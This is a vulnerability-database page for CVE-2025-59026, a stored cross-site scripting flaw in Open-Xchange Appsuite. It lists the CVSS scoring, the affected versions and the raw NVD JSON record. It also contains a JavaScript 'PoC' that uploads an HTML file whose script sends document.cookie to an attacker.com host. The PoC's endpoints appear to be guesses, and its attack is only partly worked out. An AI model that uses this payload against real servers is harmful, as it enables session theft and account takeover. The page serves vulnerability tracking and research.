Security Vulnerability Report
CVE-2025-59026 CVSS 5.4 MEDIUM

CVE-2025-59026

Published: 2025-11-27 10:15:52
Last Modified: 2026-04-15 00:35:42

Description

Malicious content uploaded as a file can be used to execute script code when following attacker-controlled links. Unintended actions can be executed in the context of the user's account, including exfiltration of sensitive information. Please deploy the provided updates and patch releases. No publicly available exploits are known.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No CPE configuration data is available for this record. Affected version ranges listed for this CVE:

Open-Xchange Appsuite < 7.10.6-rev39
Open-Xchange Appsuite < 7.10.7-rev15
Open-Xchange Appsuite < 8.10.0-rev12
Open-Xchange Appsuite < 8.15.0-rev7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// CVE-2025-59026 PoC - Open-Xchange Appsuite Stored XSS
// This PoC demonstrates the stored XSS vulnerability via file upload

// Step 1: Create malicious file with XSS payload
const maliciousContent = '<script>\n fetch("https://attacker.com/steal?cookie=" + document.cookie)\n<\/script>';

// Step 2: Upload malicious file to Open-Xchange Appsuite
async function uploadMaliciousFile() {
  const uploadUrl = 'https://target-server/ajax/upload';
  const formData = new FormData();
  formData.append('file', new Blob([maliciousContent]), 'malicious.html');
  const response = await fetch(uploadUrl, {
    method: 'POST',
    credentials: 'include',
    body: formData
  });
  return response.json();
}

// Step 3: Generate attacker-controlled link to the uploaded file
function generateAttackerLink(fileId) {
  return `https://target-server/redirect?file=${fileId}`;
}

// Step 4: XSS payload - Cookie stealing
// The script executes when victim views the uploaded file,
// sending cookies to attacker's server
console.log('[+] XSS Payload: Cookie stealing initiated');

References

https://documentation.open-xchange.com/appsuite/security/advisories/csaf/2025/oxas-adv-2025-0003.json (vendor CSAF advisory, from the record's references field)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-59026", "sourceIdentifier": "[email protected]", "published": "2025-11-27T10:15:52.007", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Malicious content uploaded as file can be used to execute script code when following attacker-controlled links. Unintended actions can be executed in the context of the users account, including exfiltration of sensitive information. Please deploy the provided updates and patch releases. No publicly available exploits are known"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://documentation.open-xchange.com/appsuite/security/advisories/csaf/2025/oxas-adv-2025-0003.json", "source": "[email protected]"}]}}